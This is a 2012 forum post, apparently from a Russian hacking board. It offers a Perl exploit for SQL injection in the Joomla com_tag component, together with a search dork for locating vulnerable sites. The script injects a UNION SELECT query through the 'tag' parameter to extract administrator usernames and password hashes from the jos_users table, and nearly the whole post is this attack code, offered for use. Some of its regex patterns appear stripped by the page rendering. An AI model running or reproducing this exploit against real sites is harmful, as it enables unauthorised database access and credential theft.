19.10.2012, 21:33
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Joomla tag Remote Sql Exploit
dork: inurl:index.php?option=com_tag
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/perl -w
[/COLOR][COLOR="#007700"]print[/COLOR][COLOR="#DD0000"]"\t\t\n\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t \n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t Joomla com_tag Remote Sql Exploit \n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t\n\n"[/COLOR][COLOR="#007700"];
use[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\nExample:[http://wwww.site.com/]: "[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]chomp[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]my $target[/COLOR][COLOR="#007700"]=);
[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"username"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"password"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"jos_users"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"com_tag&task"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]LWP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]UserAgent[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]() or die[/COLOR][COLOR="#DD0000"]"Could not initialize browser\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]agent[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"index.php?option="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$d4n[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"&tag=999999.9' union all select 1,concat(0x3c757365723e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c757365723e3c706173733e,"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",0x3c706173733e)+from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"--+a"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]request[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]HTTP[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Request[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]GET[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]content[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~ /(.*?)/){
print[/COLOR][COLOR="#DD0000"]"\nLos Information for site:\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\n
* Admin User : $1"[/COLOR][COLOR="#007700"];
}
if ([/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=~/(.*?)/){print[/COLOR][COLOR="#DD0000"]"\n
* Admin Hash : $1\n\n"[/COLOR][COLOR="#007700"];
print[/COLOR][COLOR="#DD0000"]"\t\t# Exploit finished #\n\n"[/COLOR][COLOR="#007700"];}
else{print[/COLOR][COLOR="#DD0000"]"\n[-] Exploit Failed...\n"[/COLOR][COLOR="#007700"];}
[/COLOR][/COLOR]
|
|
|